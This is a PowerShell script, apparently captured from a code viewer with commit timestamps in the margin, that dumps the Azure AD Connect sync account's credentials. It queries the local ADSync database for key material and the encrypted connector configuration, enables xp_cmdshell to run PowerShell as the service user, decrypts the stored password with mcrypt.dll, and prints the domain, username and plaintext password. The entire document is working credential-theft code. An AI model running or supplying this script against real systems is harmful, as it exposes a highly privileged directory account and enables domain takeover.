2023-02-13 17:23:15 +00:00
|
|
|
$sqlbin=@(Get-ChildItem -Path C:\"Program Files"\"Microsoft SQL Server"\ -Filter sqllocaldb.exe -Recurse).fullname
|
2023-04-06 02:56:36 +00:00
|
|
|
$db=@(cmd /c $sqlbin info | findstr /i ADSy)
|
2023-02-13 17:23:15 +00:00
|
|
|
|
|
|
|
|
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\$db;Initial Catalog=ADSync"
|
|
|
|
|
|
|
|
|
|
try {
|
|
|
|
|
$client.Open()
|
|
|
|
|
} catch {
|
|
|
|
|
Write-Host "[!] Could not connect to localdb..."
|
|
|
|
|
return
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
Write-Host "[*] Querying ADSync localdb (mms_server_configuration)"
|
|
|
|
|
|
|
|
|
|
$cmd = $client.CreateCommand()
|
|
|
|
|
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
|
|
|
|
|
$reader = $cmd.ExecuteReader()
|
|
|
|
|
if ($reader.Read() -ne $true) {
|
|
|
|
|
Write-Host "[!] Error querying mms_server_configuration"
|
|
|
|
|
return
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
$key_id = $reader.GetInt32(0)
|
|
|
|
|
$instance_id = $reader.GetGuid(1)
|
|
|
|
|
$entropy = $reader.GetGuid(2)
|
|
|
|
|
$reader.Close()
|
|
|
|
|
|
|
|
|
|
Write-Host "[*] Querying ADSync localdb (mms_management_agent)"
|
|
|
|
|
|
|
|
|
|
$cmd = $client.CreateCommand()
|
|
|
|
|
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
|
|
|
|
|
$reader = $cmd.ExecuteReader()
|
|
|
|
|
if ($reader.Read() -ne $true) {
|
|
|
|
|
Write-Host "[!] Error querying mms_management_agent"
|
|
|
|
|
return
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
$config = $reader.GetString(0)
|
|
|
|
|
$crypted = $reader.GetString(1)
|
|
|
|
|
$reader.Close()
|
|
|
|
|
|
|
|
|
|
Write-Host "[*] Using xp_cmdshell to run some Powershell as the service user"
|
|
|
|
|
|
|
|
|
|
$cmd = $client.CreateCommand()
|
|
|
|
|
$cmd.CommandText = "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'powershell.exe -c `"add-type -path ''C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'';`$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager;`$km.LoadKeySet([guid]''$entropy'', [guid]''$instance_id'', $key_id);`$key = `$null;`$km.GetActiveCredentialKey([ref]`$key);`$key2 = `$null;`$km.GetKey(1, [ref]`$key2);`$decrypted = `$null;`$key2.DecryptBase64ToString(''$crypted'', [ref]`$decrypted);Write-Host `$decrypted`"'"
|
|
|
|
|
$reader = $cmd.ExecuteReader()
|
|
|
|
|
|
|
|
|
|
$decrypted = [string]::Empty
|
|
|
|
|
|
|
|
|
|
while ($reader.Read() -eq $true -and $reader.IsDBNull(0) -eq $false) {
|
|
|
|
|
$decrypted += $reader.GetString(0)
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
if ($decrypted -eq [string]::Empty) {
|
|
|
|
|
Write-Host "[!] Error using xp_cmdshell to launch our decryption powershell"
|
|
|
|
|
return
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerText}}
|
|
|
|
|
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerText}}
|
|
|
|
|
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
|
|
|
|
|
|
|
|
|
|
Write-Host "Domain: $($domain.Domain)"
|
|
|
|
|
Write-Host "Username: $($username.Username)"
|
|
|
|
|
Write-Host "Password: $($password.Password)"
|
